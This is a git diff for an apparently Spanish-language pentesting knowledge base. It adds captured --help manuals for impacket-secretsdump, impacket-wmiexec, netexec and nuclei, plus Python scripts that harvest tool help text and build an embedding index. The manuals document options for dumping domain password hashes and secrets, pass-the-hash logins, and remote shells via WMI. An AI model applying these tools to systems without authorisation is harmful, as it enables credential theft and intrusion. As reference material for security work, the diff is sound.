[-exec-method [{smbexec,wmiexec,mmcexec}]] + [-just-dc-user USERNAME] [-just-dc] [-just-dc-ntlm] + [-pwd-last-set] [-user-status] [-history] + [-hashes LMHASH:NTHASH] [-no-pass] [-k] + [-aesKey hex key] [-keytab KEYTAB] [-dc-ip ip address] + [-target-ip ip address] + target + +Performs various techniques to dump secrets from the remote machine without +executing any agent there. + +positional arguments: + target [[domain/]username[:password]@] + or LOCAL (if you want to parse local files) + +options: + -h, --help show this help message and exit + -ts Adds timestamp to every logging output + -debug Turn DEBUG output ON + -system SYSTEM SYSTEM hive to parse + -bootkey BOOTKEY bootkey for SYSTEM hive + -security SECURITY SECURITY hive to parse + -sam SAM SAM hive to parse + -ntds NTDS NTDS.DIT file to parse + -resumefile RESUMEFILE + resume file name to resume NTDS.DIT session dump (only + available to DRSUAPI approach). This file will also be + used to keep updating the session's state + -outputfile OUTPUTFILE + base output filename. Extensions will be added for + sam, secrets, cached and ntds + -use-vss Use the VSS method instead of default DRSUAPI + -rodcNo RODCNO Number of the RODC krbtgt account (only avaiable for + Kerb-Key-List approach) + -rodcKey RODCKEY AES key of the Read Only Domain Controller (only + avaiable for Kerb-Key-List approach) + -use-keylist Use the Kerb-Key-List method instead of default + DRSUAPI + -exec-method [{smbexec,wmiexec,mmcexec}] + Remote exec method to use at target (only when using + -use-vss). Default: smbexec + +display options: + -just-dc-user USERNAME + Extract only NTDS.DIT data for the user specified. + Only available for DRSUAPI approach. Implies also + -just-dc switch + -just-dc Extract only NTDS.DIT data (NTLM hashes and Kerberos + keys) + -just-dc-ntlm Extract only NTDS.DIT data (NTLM hashes only) + -pwd-last-set Shows pwdLastSet attribute for each NTDS.DIT account. + Doesn't apply to -outputfile data + -user-status Display whether or not the user is disabled + -history Dump password history, and LSA secrets OldVal + +authentication: + -hashes LMHASH:NTHASH + NTLM hashes, format is LMHASH:NTHASH + -no-pass don't ask for password (useful for -k) + -k Use Kerberos authentication. Grabs credentials from + ccache file (KRB5CCNAME) based on target parameters. + If valid credentials cannot be found, it will use the + ones specified in the command line + -aesKey hex key AES key to use for Kerberos Authentication (128 or 256 + bits) + -keytab KEYTAB Read keys for SPN from keytab file + +connection: + -dc-ip ip address IP Address of the domain controller. If ommited it use + the domain part (FQDN) specified in the target + parameter + -target-ip ip address + IP Address of the target machine. If omitted it will + use whatever was specified as target. This is useful + when target is the NetBIOS name and you cannot resolve + it +``` diff --git a/nucleo/saber/conocimiento/09 - Manuales/impacket-wmiexec.md b/nucleo/saber/conocimiento/09 - Manuales/impacket-wmiexec.md new file mode 100644 index 0000000..ee75f97 --- /dev/null +++ b/nucleo/saber/conocimiento/09 - Manuales/impacket-wmiexec.md @@ -0,0 +1,61 @@ +# impacket-wmiexec — manual + +Salida de `impacket-wmiexec -h`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos). + +``` +Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation + +usage: wmiexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-silentcommand] + [-debug] [-codec CODEC] [-shell-type {cmd,powershell}] + [-com-version MAJOR_VERSION:MINOR_VERSION] + [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] + [-dc-ip ip address] [-A authfile] [-keytab KEYTAB] + target [command ...] + +Executes a semi-interactive shell using Windows Management Instrumentation. + +positional arguments: + target [[domain/]username[:password]@] + command command to execute at the target. If empty it will + launch a semi-interactive shell + +options: + -h, --help show this help message and exit + -share SHARE share where the output will be grabbed from (default + ADMIN$) + -nooutput whether or not to print the output (no SMB connection + created) + -ts Adds timestamp to every logging output + -silentcommand does not execute cmd.exe to run given command (no + output) + -debug Turn DEBUG output ON + -codec CODEC Sets encoding used (codec) from the target's output + (default "utf-8"). If errors are detected, run + chcp.com at the target, map the result with https://do + cs.python.org/3/library/codecs.html#standard-encodings + and then execute wmiexec.py again with -codec and the + corresponding codec + -shell-type {cmd,powershell} + choose a command processor for the semi-interactive + shell + -com-version MAJOR_VERSION:MINOR_VERSION + DCOM version, format is MAJOR_VERSION:MINOR_VERSION + e.g. 5.7 + +authentication: + -hashes LMHASH:NTHASH + NTLM hashes, format is LMHASH:NTHASH + -no-pass don't ask for password (useful for -k) + -k Use Kerberos authentication. Grabs credentials from + ccache file (KRB5CCNAME) based on target parameters. + If valid credentials cannot be found, it will use the + ones specified in the command line + -aesKey hex key AES key to use for Kerberos Authentication (128 or 256 + bits) + -dc-ip ip address IP Address of the domain controller. If ommited it use + the domain part (FQDN) specified in the target + parameter + -A authfile smbclient/mount.cifs-style authentication file. See + smbclient man page's -A option. + -keytab KEYTAB Read keys for SPN from keytab file +``` diff --git a/nucleo/saber/conocimiento/09 - Manuales/netexec.md b/nucleo/saber/conocimiento/09 - Manuales/netexec.md new file mode 100644 index 0000000..f575a37 --- /dev/null +++ b/nucleo/saber/conocimiento/09 - Manuales/netexec.md @@ -0,0 +1,66 @@ +# netexec — manual + +Salida de `netexec --help`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos). + +``` +usage: netexec [-h] [--version] [-t THREADS] [--timeout TIMEOUT] + [--jitter INTERVAL] [--no-progress] [--log LOG] + [--verbose | --debug] [-6] [--dns-server DNS_SERVER] + [--dns-tcp] [--dns-timeout DNS_TIMEOUT] + {smb,ftp,ldap,mssql,winrm,nfs,ssh,wmi,vnc,rdp} ... + + . . + .| |. _ _ _ _____ + || || | \ | | ___ | |_ | ____| __ __ ___ ___ + \\( )// | \| | / _ \ | __| | _| \ \/ / / _ \ / __| + .=[ ]=. | |\ | | __/ | |_ | |___ > < | __/ | (__ + / /˙-˙\ \ |_| \_| \___| \__| |_____| /_/\_\ \___| \___| + ˙ \ / ˙ + ˙ ˙ + + The network execution tool + Maintained as an open source project by @NeffIsBack, @MJHallenbeck, @_zblurx + + For documentation and usage examples, visit: https://www.netexec.wiki/ + + Version : 1.5.1 + Codename: Yippie-Ki-Yay + Commit : 515dccee + +options: + -h, --help show this help message and exit + --verbose enable verbose output + --debug enable debug level information + +Generic Options: + --version Display nxc version + -t THREADS, --threads THREADS + set how many concurrent threads to use + --timeout TIMEOUT max timeout in seconds of each thread + --jitter INTERVAL sets a random delay between each authentication + +Output Options: + --no-progress do not displaying progress bar during scan + --log LOG export result into a custom file + +DNS: + -6 Enable force IPv6 + --dns-server DNS_SERVER + Specify DNS server (default: Use hosts file & System DNS) + --dns-tcp Use TCP instead of UDP for DNS queries + --dns-timeout DNS_TIMEOUT + DNS query timeout in seconds + +Available Protocols: + {smb,ftp,ldap,mssql,winrm,nfs,ssh,wmi,vnc,rdp} + smb own stuff using SMB + ftp own stuff using FTP + ldap own stuff using LDAP + mssql own stuff using MSSQL + winrm own stuff using WINRM + nfs own stuff using NFS + ssh own stuff using SSH + wmi own stuff using WMI + vnc own stuff using VNC + rdp own stuff using RDP +``` diff --git a/nucleo/saber/conocimiento/09 - Manuales/nuclei.md b/nucleo/saber/conocimiento/09 - Manuales/nuclei.md new file mode 100644 index 0000000..a30ad84 --- /dev/null +++ b/nucleo/saber/conocimiento/09 - Manuales/nuclei.md @@ -0,0 +1,249 @@ +# nuclei — manual + +Salida de `nuclei --help`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos). + +``` +Nuclei is a fast, template based vulnerability scanner focusing +on extensive configurability, massive extensibility and ease of use. + +Usage: + nuclei [flags] + +Flags: +TARGET: + -u, -target string[] target URLs/hosts to scan + -l, -list string path to file containing a list of target URLs/hosts to scan (one per line) + -eh, -exclude-hosts string[] hosts to exclude to scan from the input list (ip, cidr, hostname) + -resume string resume scan using resume.cfg (clustering will be disabled) + -sa, -scan-all-ips scan all the IP's associated with dns record + -iv, -ip-version string[] IP version to scan of hostname (4,6) - (default 4) + +TARGET-FORMAT: + -im, -input-mode string mode of input file (list, burp, jsonl, yaml, openapi, swagger) (default "list") + -ro, -required-only use only required fields in input format when generating requests + -sfv, -skip-format-validation skip format validation (like missing vars) when parsing input file + +TEMPLATES: + -nt, -new-templates run only new templates added in latest nuclei-templates release + -ntv, -new-templates-version string[] run new templates added in specific version + -as, -automatic-scan automatic web scan using wappalyzer technology detection to tags mapping + -t, -templates string[] list of template or template directory to run (comma-separated, file) + -turl, -template-url string[] template url or list containing template urls to run (comma-separated, file) + -ai, -prompt string generate and run template using ai prompt + -w, -workflows string[] list of workflow or workflow directory to run (comma-separated, file) + -wurl, -workflow-url string[] workflow url or list containing workflow urls to run (comma-separated, file) + -validate validate the passed templates to nuclei + -nss, -no-strict-syntax disable strict syntax check on templates + -td, -template-display displays the templates content + -tl list all available templates + -tgl list all available tags + -sign signs the templates with the private key defined in NUCLEI_SIGNATURE_PRIVATE_KEY env variable + -code enable loading code protocol-based templates + -dut, -disable-unsigned-templates disable running unsigned templates or templates with mismatched signature + -esc, -enable-self-contained enable loading self-contained templates + -egm, -enable-global-matchers enable loading global matchers templates + -file enable loading file templates + +FILTERING: + -a, -author string[] templates to run based on authors (comma-separated, file) + -tags string[] templates to run based on tags (comma-separated, file) + -etags, -exclude-tags string[] templates to exclude based on tags (comma-separated, file) + -itags, -include-tags string[] tags to be executed even if they are excluded either by default or configuration + -id, -template-id string[] templates to run based on template ids (comma-separated, file, allow-wildcard) + -eid, -exclude-id string[] templates to exclude based on template ids (comma-separated, file) + -it, -include-templates string[] path to template file or directory to be executed even if they are excluded either by default or configuration + -et, -exclude-templates string[] path to template file or directory to exclude (comma-separated, file) + -em, -exclude-matchers string[] template matchers to exclude in result + -s, -severity value[] templates to run based on severity. Possible values: info, low, medium, high, critical, unknown + -es, -exclude-severity value[] templates to exclude based on severity. Possible values: info, low, medium, high, critical, unknown + -pt, -type value[] templates to run based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript + -ept, -exclude-type value[] templates to exclude based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript + -tc, -template-condition string[] templates to run based on expression condition + +OUTPUT: + -o, -output string output file to write found issues/vulnerabilities + -sresp, -store-resp store all request/response passed through nuclei to output directory + -srd, -store-resp-dir string store all request/response passed through nuclei to custom directory (default "output") + -silent display findings only + -nc, -no-color disable output content coloring (ANSI escape codes) + -j, -jsonl write output in JSONL(ines) format + -irr, -include-rr -omit-raw include request/response pairs in the JSON, JSONL, and Markdown outputs (for findings only) [DEPRECATED use -omit-raw] (default true) + -or, -omit-raw omit request/response pairs in the JSON, JSONL, and Markdown outputs (for findings only) + -ot, -omit-template omit encoded template in the JSON, JSONL output + -nm, -no-meta disable printing result metadata in cli output + -ts, -timestamp enables printing timestamp in cli output + -rdb, -report-db string nuclei reporting database (always use this to persist report data) + -ms, -matcher-status display match failure status + -me, -markdown-export string directory to export results in markdown format + -se, -sarif-export string file to export results in SARIF format + -je, -json-export string file to export results in JSON format + -jle, -jsonl-export string file to export results in JSONL(ine) format + -rd, -redact string[] redact given list of keys from query parameter, request header and body + +CONFIGURATIONS: + -config string path to the nuclei configuration file + -tp, -profile string template profile config file to run + -tpl, -profile-list list community template profiles + -fr, -follow-redirects enable following redirects for http templates + -fhr, -follow-host-redirects follow redirects on the same host + -mr, -max-redirects int max number of redirects to follow for http templates (default 10) + -dr, -disable-redirects disable redirects for http templates + -rc, -report-config string nuclei reporting module configuration file + -H, -header string[] custom header/cookie to include in all http request in header:value format (cli, file) + -V, -var value custom vars in key=value format + -r, -resolvers string file containing resolver list for nuclei + -sr, -system-resolvers use system DNS resolving as error fallback + -dc, -disable-clustering disable clustering of requests + -passive enable passive HTTP response processing mode + -fh2, -force-http2 force http2 connection on requests + -ev, -env-vars enable environment variables to be used in template + -cc, -client-cert string client certificate file (PEM-encoded) used for authenticating against scanned hosts + -ck, -client-key string client key file (PEM-encoded) used for authenticating against scanned hosts + -ca, -client-ca string client certificate authority file (PEM-encoded) used for authenticating against scanned hosts + -sml, -show-match-line show match lines for file templates, works with extractors only + -ztls use ztls library with autofallback to standard one for tls13 [Deprecated] autofallback to ztls is enabled by default + -sni string tls sni hostname to use (default: input domain name) + -dka, -dialer-keep-alive value keep-alive duration for network requests. + -lfa, -allow-local-file-access allows file (payload) access anywhere on the system + -lna, -restrict-local-network-access blocks connections to the local / private network + -i, -interface string network interface to use for network scan + -at, -attack-type string type of payload combinations to perform (batteringram,pitchfork,clusterbomb) + -sip, -source-ip string source ip address to use for network scan + -rsr, -response-size-read int max response size to read in bytes + -rss, -response-size-save int max response size to read in bytes (default 1048576) + -reset reset removes all nuclei configuration and data files (including nuclei-templates) + -tlsi, -tls-impersonate enable experimental client hello (ja3) tls randomization + -hae, -http-api-endpoint string experimental http api endpoint + +INTERACTSH: + -iserver, -interactsh-server string interactsh server url for self-hosted instance (default: oast.pro,oast.live,oast.site,oast.online,oast.fun,oast.me) + -itoken, -interactsh-token string authentication token for self-hosted interactsh server + -interactions-cache-size int number of requests to keep in the interactions cache (default 5000) + -interactions-eviction int number of seconds to wait before evicting requests from cache (default 60) + -interactions-poll-duration int number of seconds to wait before each interaction poll request (default 5) + -interactions-cooldown-period int extra time for interaction polling before exiting (default 5) + -ni, -no-interactsh disable interactsh server for OAST testing, exclude OAST based templates + +FUZZING: + -ft, -fuzzing-type string overrides fuzzing type set in template (replace, prefix, postfix, infix) + -fm, -fuzzing-mode string overrides fuzzing mode set in template (multiple, single) + -fuzz enable loading fuzzing templates (Deprecated: use -dast instead) + -dast enable / run dast (fuzz) nuclei templates + -dts, -dast-server enable dast server mode (live fuzzing) + -dtr, -dast-report write dast scan report to file + -dtst, -dast-server-token string dast server token (optional) + -dtsa, -dast-server-address string dast server address (default "localhost:9055") + -dfp, -display-fuzz-points display fuzz points in the output for debugging + -fuzz-param-frequency int frequency of uninteresting parameters for fuzzing before skipping (default 10) + -fa, -fuzz-aggression string fuzzing aggression level controls payload count for fuzz (low, medium, high) (default "low") + -cs, -fuzz-scope string[] in scope url regex to be followed by fuzzer + -cos, -fuzz-out-scope string[] out of scope url regex to be excluded by fuzzer + +UNCOVER: + -uc, -uncover enable uncover engine + -uq, -uncover-query string[] uncover search query + -ue, -uncover-engine string[] uncover search engine (shodan,censys,fofa,shodan-idb,quake,hunter,zoomeye,netlas,criminalip,publicwww,hunterhow,google,odin,binaryedge) (default shodan) + -uf, -uncover-field string uncover fields to return (ip,port,host) (default "ip:port") + -ul, -uncover-limit int uncover results to return (default 100) + -ur, -uncover-ratelimit int override ratelimit of engines with unknown ratelimit (default 60 req/min) (default 60) + +RATE-LIMIT: + -rl, -rate-limit int maximum number of requests to send per second (default 150) + -rld, -rate-limit-duration value maximum number of requests to send per second (default 1s) + -rlm, -rate-limit-minute int maximum number of requests to send per minute (DEPRECATED) + -bs, -bulk-size int maximum number of hosts to be analyzed in parallel per template (default 25) + -c, -concurrency int maximum number of templates to be executed in parallel (default 25) + -hbs, -headless-bulk-size int maximum number of headless hosts to be analyzed in parallel per template (default 10) + -headc, -headless-concurrency int maximum number of headless templates to be executed in parallel (default 10) + -jsc, -js-concurrency int maximum number of javascript runtimes to be executed in parallel (default 120) + -pc, -payload-concurrency int max payload concurrency for each template (default 25) + -prc, -probe-concurrency int http probe concurrency with httpx (default 50) + +OPTIMIZATIONS: + -timeout int time to wait in seconds before timeout (default 10) + -retries int number of times to retry a failed request (default 1) + -ldp, -leave-default-ports leave default HTTP/HTTPS ports (eg. host:80,host:443) + -mhe, -max-host-error int max errors for a host before skipping from scan (default 30) + -te, -track-error string[] adds given error to max-host-error watchlist (standard, file) + -nmhe, -no-mhe disable skipping host from scan based on errors + -project use a project folder to avoid sending same request multiple times + -project-path string set a specific project path (default "/tmp") + -spm, -stop-at-first-match stop processing HTTP requests after the first match (may break template/workflow logic) + -stream stream mode - start elaborating without sorting the input + -ss, -scan-strategy value strategy to use while scanning(auto/host-spray/template-spray) (default auto) + -irt, -input-read-timeout value timeout on input read (default 3m0s) + -nh, -no-httpx disable httpx probing for non-url input + -no-stdin disable stdin processing + +HEADLESS: + -headless enable templates that require headless browser support (root user on Linux will disable sandbox) + -page-timeout int seconds to wait for each page in headless mode (default 20) + -sb, -show-browser show the browser on the screen when running templates with headless mode + -ho, -headless-options string[] start headless chrome with additional options + -sc, -system-chrome use local installed Chrome browser instead of nuclei installed + -lha, -list-headless-action list available headless actions + +DEBUG: + -debug show all requests and responses + -dreq, -debug-req show all sent requests + -dresp, -debug-resp show all received responses + -p, -proxy string[] list of http/socks5 proxy to use (comma separated or file input) + -pi, -proxy-internal proxy all internal requests + -ldf, -list-dsl-function list all supported DSL function signatures + -tlog, -trace-log string file to write sent requests trace log + -elog, -error-log string file to write sent requests error log + -version show nuclei version + -hm, -hang-monitor enable nuclei hang monitoring + -v, -verbose show verbose output + -profile-mem string generate memory (heap) profile & trace files + -vv display templates loaded for scan + -svd, -show-var-dump show variables dump for debugging + -vdl, -var-dump-limit int limit the number of characters displayed in var dump (default 255) + -ep, -enable-pprof enable pprof debugging server + -tv, -templates-version shows the version of the installed nuclei-templates + -hc, -health-check run diagnostic check up + +UPDATE: + -up, -update update nuclei engine to the latest released version + -ut, -update-templates update nuclei-templates to latest released version + -ud, -update-template-dir string custom directory to install / update nuclei-templates + -duc, -disable-update-check disable automatic nuclei/templates update check + +STATISTICS: + -stats display statistics about the running scan + -sj, -stats-json display statistics in JSONL(ines) format + -si, -stats-interval int number of seconds to wait between showing a statistics update (default 5) + -mp, -metrics-port int port to expose nuclei metrics on (default 9092) + -hps, -http-stats enable http status capturing (experimental) + +CLOUD: + -auth configure projectdiscovery cloud (pdcp) api key (default true) + -tid, -team-id string upload scan results to given team id (optional) (default "none") + -cup, -cloud-upload upload scan results to pdcp dashboard [DEPRECATED use -dashboard] + -sid, -scan-id string upload scan results to existing scan id (optional) + -sname, -scan-name string scan name to set (optional) + -pd, -dashboard upload / view nuclei results in projectdiscovery cloud (pdcp) UI dashboard + -pdu, -dashboard-upload string upload / view nuclei results file (jsonl) in projectdiscovery cloud (pdcp) UI dashboard + +AUTHENTICATION: + -sf, -secret-file string[] path to config file containing secrets for nuclei authenticated scan + -ps, -prefetch-secrets prefetch secrets from the secrets file + +EXAMPLES: +Run nuclei on single host: + $ nuclei -target example.com + +Run nuclei with specific template directories: + $ nuclei -target example.com -t http/cves/ -t ssl + +Run nuclei against a list of hosts: + $ nuclei -list hosts.txt + +Run nuclei with a JSON output: + $ nuclei -target example.com -json-export output.json + +Run nuclei with sorted Markdown outputs (with environment variables): + $ MARKDOWN_EXPORT_SORT_MODE=template nuclei -target example.com -markdown-export nuclei_report/ + +Additional documentation is available at: https://docs.nuclei.sh/getting-started/running +``` diff --git a/nucleo/saber/conocimiento/README.md b/nucleo/saber/conocimiento/README.md index aba70d5..ab41494 100644 --- a/nucleo/saber/conocimiento/README.md +++ b/nucleo/saber/conocimiento/README.md @@ -10,6 +10,15 @@ con los comandos que se usan de verdad. Usan marcadores como `TU_IP` en vez de direcciones reales; están limpios de datos personales (sin hosts, credenciales, rutas ni referencias privadas). +`06 - Cheatsheets/Comandos de herramientas.md` reúne las invocaciones más usadas +de las herramientas que no traen man page (ffuf, sqlmap, la suite impacket, +netexec, hydra, evil-winrm...). `09 - Manuales/` va un paso más allá: es la salida +de `--help` de esas mismas herramientas, cosechada con `../manuales.py` de la +propia herramienta instalada y limpia de rutas. Entre las dos cosas —la +invocación común y la referencia completa de opciones— el modelo tiene el manual +que la man page no da. Si instalas una herramienta más, corre `manuales.py` y +manda el `.md` nuevo: es un buen commit. + Es la parte del RAG que SÍ se publica: el conocimiento genérico. Los apuntes personales del usuario (su `saber.jsonl`, su diario) no se suben —ver [../../../PRIVACIDAD.md](../../../PRIVACIDAD.md)—; este pack los complementa, y en diff --git a/nucleo/saber/indexa.py b/nucleo/saber/indexa.py index 03d30a2..544b80b 100755 --- a/nucleo/saber/indexa.py +++ b/nucleo/saber/indexa.py @@ -36,6 +36,10 @@ import sys AQUI = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) COFRE = os.path.expanduser("~/COFRE") INDICE = os.path.join(AQUI, "datos", "saber.jsonl") +# El indice PUBLICO y portable: solo glosario + pack de conocimiento, sin nada de +# la maquina (ni COFRE, ni man pages, ni servidores). Se commitea con vectores ya +# calculados para que un clon recien hecho consulte al instante, sin reindexar. +INDICE_PUBLICO = os.path.join(AQUI, "datos", "saber-publico.jsonl") # Los perfiles que se indexan. Cada uno es una carpeta de ~/COFRE. PERFILES = ["PENTESTERS", "PHISHERS", "REVERSERS", "PROTECTORS", "HARD-WARERS", @@ -145,6 +149,66 @@ def trocea(ruta): yield buffer.strip() +def _conocimiento(): + """El pack de metodologia y manuales que viene con el repo (conocimiento/).""" + fragmentos = [] + base_con = os.path.join(os.path.dirname(os.path.abspath(__file__)), "conocimiento") + if not os.path.isdir(base_con): + return fragmentos + for raiz, _, ficheros in os.walk(base_con): + m = re.match(r"^\d{2}\s*-\s*(.+)$", os.path.basename(raiz)) + tema = m.group(1).strip().lower() if m else "" + for fich in ficheros: + if not fich.endswith(".md"): + continue + for trozo in trocea(os.path.join(raiz, fich)): + fragmentos.append({ + "tipo": "metodologia", "herramienta": fich[:-3], + "perfil": "PENTESTERS", "tema": tema, + "fichero": os.path.join("conocimiento", os.path.relpath( + os.path.join(raiz, fich), base_con)), + "texto": trozo}) + return fragmentos + + +def _guarda_indice(todo, ruta): + """Calcula los vectores de las entradas y las escribe a un indice jsonl.""" + print(" cargando el modelo de embeddings...", flush=True) + from model2vec import StaticModel + modelo = StaticModel.from_pretrained("minishlab/potion-multilingual-128M") + + print(" calculando vectores...", flush=True) + vectores = modelo.encode([e["texto"] for e in todo], show_progress_bar=False) + + os.makedirs(os.path.dirname(ruta), exist_ok=True) + with open(ruta, "w", encoding="utf-8") as f: + for entrada, vec in zip(todo, vectores): + entrada["v"] = [round(float(x), 5) for x in vec] + f.write(json.dumps(entrada, ensure_ascii=False) + "\n") + print(f" indice guardado: {ruta} ({os.path.getsize(ruta)//1024} KB)") + + +def construye_publico(solo_cuenta=False): + """El indice PORTABLE que se sube al repo: glosario + pack de conocimiento. + + Nada de la maquina —ni COFRE, ni man pages, ni servidores SSH—, asi que es + 100 % publico y vale igual en cualquier equipo. Un clon lo usa tal cual hasta + que corre su propio indexa.py; asi el trabajo de indexar el pack no se repite. + """ + try: + from saber import glosario + except ImportError: + import glosario + glo = list(glosario.entradas()) + con = _conocimiento() + todo = glo + con + print(f" glosario {len(glo)} + conocimiento {len(con)} = {len(todo)} entradas publicas") + if solo_cuenta: + return 0 + _guarda_indice(todo, INDICE_PUBLICO) + return 0 + + def construye(solo_cuenta=False, solo_cofre=False): fichas, fragmentos = [], [] @@ -195,23 +259,8 @@ def construye(solo_cuenta=False, solo_cofre=False): # esta scrubeado, asi que un clon recien hecho —sin apuntes propios de COFRE— # ya sabe de pentesting. En la maquina del usuario se solapa con sus apuntes # y el deduplicado de busca lo colapsa. - conocimiento = [] - base_con = os.path.join(os.path.dirname(os.path.abspath(__file__)), "conocimiento") - if os.path.isdir(base_con): - for raiz, _, ficheros in os.walk(base_con): - m = re.match(r"^\d{2}\s*-\s*(.+)$", os.path.basename(raiz)) - tema = m.group(1).strip().lower() if m else "" - for fich in ficheros: - if not fich.endswith(".md"): - continue - for trozo in trocea(os.path.join(raiz, fich)): - conocimiento.append({ - "tipo": "metodologia", "herramienta": fich[:-3], - "perfil": "PENTESTERS", "tema": tema, - "fichero": os.path.join("conocimiento", os.path.relpath( - os.path.join(raiz, fich), base_con)), - "texto": trozo}) - print(f" CONOCIMIENTO {len(conocimiento):5d} fragmentos (pack del repo)") + conocimiento = _conocimiento() + print(f" CONOCIMIENTO {len(conocimiento):5d} fragmentos (pack del repo)") todo = fichas + fragmentos + sistema + conocimiento print(f"\n total: {len(fichas)} fichas + {len(fragmentos)} apuntes + " @@ -219,19 +268,7 @@ def construye(solo_cuenta=False, solo_cofre=False): if solo_cuenta: return 0 - print(" cargando el modelo de embeddings...", flush=True) - from model2vec import StaticModel - modelo = StaticModel.from_pretrained("minishlab/potion-multilingual-128M") - - print(" calculando vectores...", flush=True) - vectores = modelo.encode([e["texto"] for e in todo], show_progress_bar=False) - - os.makedirs(os.path.dirname(INDICE), exist_ok=True) - with open(INDICE, "w", encoding="utf-8") as f: - for entrada, vec in zip(todo, vectores): - entrada["v"] = [round(float(x), 5) for x in vec] - f.write(json.dumps(entrada, ensure_ascii=False) + "\n") - print(f" indice guardado: {INDICE} ({os.path.getsize(INDICE)//1024} KB)") + _guarda_indice(todo, INDICE) return 0 @@ -246,7 +283,11 @@ def main() -> int: help="di que encontrarias, sin indexar") p.add_argument("--solo-cofre", action="store_true", help="indexar solo COFRE, sin la documentacion del sistema") + p.add_argument("--publico", action="store_true", + help="construir el indice portable (glosario + conocimiento) que se sube al repo") a = p.parse_args() + if a.publico: + return construye_publico(solo_cuenta=a.cuenta) return construye(solo_cuenta=a.cuenta, solo_cofre=a.solo_cofre) diff --git a/nucleo/saber/manuales.py b/nucleo/saber/manuales.py new file mode 100644 index 0000000..14feaa5 --- /dev/null +++ b/nucleo/saber/manuales.py @@ -0,0 +1,139 @@ +#!/usr/bin/env python3 +"""Cosecha el manual de las herramientas que no traen man page. + + ./manuales.py regenera conocimiento/09 - Manuales/ + ./manuales.py --lista di que herramientas cosecharia y cuales estan + +Muchas herramientas de pentesting (ffuf, sqlmap, la suite impacket, netexec...) +no instalan man page: su "manual" es lo que sueltan con --help. Este script lo +captura, lo limpia de rutas y datos de la maquina, y lo escribe como markdown en +el pack de conocimiento, donde indexa.py lo recoge como todo lo demas. + +Solo cosecha lo que ESTA instalado en la maquina. El resultado (los .md) se +commitea, asi que crece con lo que cada quien tenga: quien instale una +herramienta mas, regenera y manda el .md nuevo. Es el complemento verificado del +cheatsheet escrito a mano (que da las invocaciones comunes; esto da la lista +completa de opciones). +""" +import argparse +import os +import re +import shutil +import subprocess +import sys + +AQUI = os.path.dirname(os.path.abspath(__file__)) +DESTINO = os.path.join(AQUI, "conocimiento", "09 - Manuales") + +# Las herramientas cuyo manual vale la pena y que no suelen traer man page. +# (comando, [argumentos para pedir la ayuda]). Se prueban en orden hasta que una +# devuelva algo con sustancia. +CATALOGO = [ + ("ffuf", ["-h"]), + ("feroxbuster", ["--help"]), + ("gobuster", ["--help"]), + ("sqlmap", ["-hh"]), + ("nuclei", ["-h"]), + ("hydra", ["-h"]), + ("netexec", ["--help"]), + ("crackmapexec", ["--help"]), + ("evil-winrm", ["--help"]), + ("john", []), # john sin args ya imprime el uso + ("hashcat", ["--help"]), + ("wpscan", ["--help"]), + ("nikto", ["-Help"]), + ("smbmap", ["-h"]), + ("enum4linux-ng", ["-h"]), + ("wfuzz", ["-h"]), + ("dirsearch", ["-h"]), + ("responder", ["-h"]), + ("chisel", ["--help"]), + ("ligolo-proxy", ["-h"]), + ("bloodhound-python", ["-h"]), + ("certipy", ["-h"]), + ("kerbrute", ["-h"]), + # La suite impacket: cada binario es una herramienta. + ("impacket-secretsdump", ["-h"]), + ("impacket-GetUserSPNs", ["-h"]), + ("impacket-GetNPUsers", ["-h"]), + ("impacket-getTGT", ["-h"]), + ("impacket-psexec", ["-h"]), + ("impacket-wmiexec", ["-h"]), + ("impacket-smbexec", ["-h"]), + ("impacket-smbserver", ["-h"]), + ("impacket-mssqlclient", ["-h"]), + ("impacket-ntlmrelayx", ["-h"]), +] + +ANSI = re.compile(r"\x1b\[[0-9;]*[A-Za-z]") +CASA = re.compile(re.escape(os.path.expanduser("~"))) +USUARIO = re.compile(re.escape(os.environ.get("USER", "\0nadie\0"))) + + +def limpia(texto): + """Quita colores y cualquier rastro de la maquina de esta cosecha.""" + texto = ANSI.sub("", texto) + texto = CASA.sub("~", texto) # /home/quien-sea -> ~ + texto = USUARIO.sub("usuario", texto) # el login real -> generico + texto = re.sub(r"[ \t]+\n", "\n", texto) # espacios al final de linea + texto = re.sub(r"\n{3,}", "\n\n", texto) # como mucho una linea en blanco + return texto.strip() + + +def ayuda(cmd, args): + """La salida de ayuda de una herramienta, o None si no dice nada util.""" + if not shutil.which(cmd): + return None + for intento in (args, ["--help"], ["-h"], []): + try: + r = subprocess.run([cmd, *intento], capture_output=True, text=True, + timeout=15, errors="ignore") + except (subprocess.TimeoutExpired, OSError): + continue + salida = (r.stdout or "") + (r.stderr or "") + salida = limpia(salida) + if len(salida) >= 120: # menos que esto no es un manual + return salida + return None + + +def escribe(cmd, texto): + md = (f"# {cmd} — manual\n\n" + f"Salida de `{cmd} {'--help' if not cmd.startswith('impacket') else '-h'}`, " + f"capturada de la propia herramienta. Referencia completa de opciones " + f"(las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n" + f"```\n{texto}\n```\n") + os.makedirs(DESTINO, exist_ok=True) + ruta = os.path.join(DESTINO, f"{cmd}.md") + with open(ruta, "w", encoding="utf-8") as f: + f.write(md) + return ruta + + +def main(): + p = argparse.ArgumentParser() + p.add_argument("--lista", action="store_true", + help="di que cosecharia y que hay instalado, sin escribir") + a = p.parse_args() + + if a.lista: + for cmd, _ in CATALOGO: + hay = "instalada" if shutil.which(cmd) else "-" + print(f" {cmd:26s} {hay}") + return 0 + + hechos = faltan = 0 + for cmd, args in CATALOGO: + texto = ayuda(cmd, args) + if texto is None: + faltan += 1 + continue + ruta = escribe(cmd, texto) + print(f" {cmd:26s} -> {os.path.relpath(ruta, AQUI)} ({len(texto)} car.)") + hechos += 1 + print(f"\n {hechos} manuales cosechados, {faltan} no instalados en esta maquina") + return 0 + + +if __name__ == "__main__": + sys.exit(main())